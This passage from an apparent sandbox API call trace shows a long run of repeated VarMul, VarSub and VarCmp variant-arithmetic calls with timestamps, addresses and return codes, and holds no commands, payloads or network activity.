pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.161] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.161] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.161] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.161] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.161] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.161] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.161] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.161] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.161] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.161] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.161] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.161] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.161] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.161] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.162] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.162] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.162] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.162] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.162] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.162] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.162] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.162] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.162] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.162] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.162] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.162] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.162] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.162] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.162] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.162] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.162] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.163] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.163] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.163] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.163] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.163] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.163] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.163] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.163] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.163] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.163] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.163] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.163] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.163] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.163] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.163] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.163] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.163] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.163] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.164] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.164] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.164] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.164] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.164] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.164] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.164] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.164] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.164] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.164] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.164] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.164] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.164] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.164] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.164] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.164] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.164] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.164] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.165] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.165] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.165] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.165] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.165] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.165] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.165] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.165] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.165] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.165] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.165] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.165] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.165] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.165] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.165] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.165] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.165] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.166] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.166] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.166] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.166] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.166] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.166] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.166] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.166] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.166] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.166] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.166] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.166] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.166] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.166] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.166] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.166] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.167] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.167] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.167] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.167] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.167] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.167] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.167] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.167] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.167] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.167] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.167] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.167] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.167] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.167] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.167] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.167] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.167] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.167] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.168] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.168] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.168] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.168] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.168] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.168] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.168] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.168] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.168] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.168] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.168] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.168] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.168] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.168] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.168] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.168] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.169] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.169] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.169] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.169] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.169] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.169] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.169] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.169] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.169] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.169] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.169] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.169] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.169] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.169] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.169] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.169] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.169] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.170] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.170] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.170] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.170] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.170] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.170] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.171] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.171] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.171] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.171] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.171] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.171] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.171] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.171] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.171] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.171] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.171] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.171] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.171] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.171] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.171] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.171] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.171] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.172] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.172] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.172] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.172] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.172] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.172] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.172] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.172] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.172] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.172] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.172] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.172] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.172] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.172] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.172] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.172] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.172] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.173] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.173] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.173] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.173] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.173] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.173] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.173] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.173] VarSub (in: pvarLeft=0xa025ed8, 